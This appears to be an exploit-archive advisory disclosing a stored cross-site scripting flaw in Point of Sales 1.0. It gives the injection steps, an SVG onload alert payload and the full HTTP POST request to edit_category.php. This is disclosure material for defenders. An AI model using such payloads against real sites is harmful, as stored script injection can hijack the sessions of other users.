Point Of Sales 1.0 Cross Site Scripting

2020.10.30

Ankita Pal (IN)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

#Exploit Title: Point of Sales 1.0 - Stored Cross Site Scripting
#Date: 2020-10-22
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/pos_0.zip
#Version: 1.0
#Tested on: Windows 10 + xampp v3.2.4
Proof of Concept:::
Step 1: Open the URL http://localhost:8081/pos/edit_category.php?id=1
Step 2: Use payload <svg onload=alert("XSS") in Name Kategori.
Malicious Request:::
POST /pos/edit_category.php?id=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/pos/edit_category.php?id=1
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
Upgrade-Insecure-Requests: 1
category=%3Csvg+onload%3D+alert%28%22XSS%22%29%3E&btn_edit=
Payload gets executed.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Point Of Sales 1.0 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.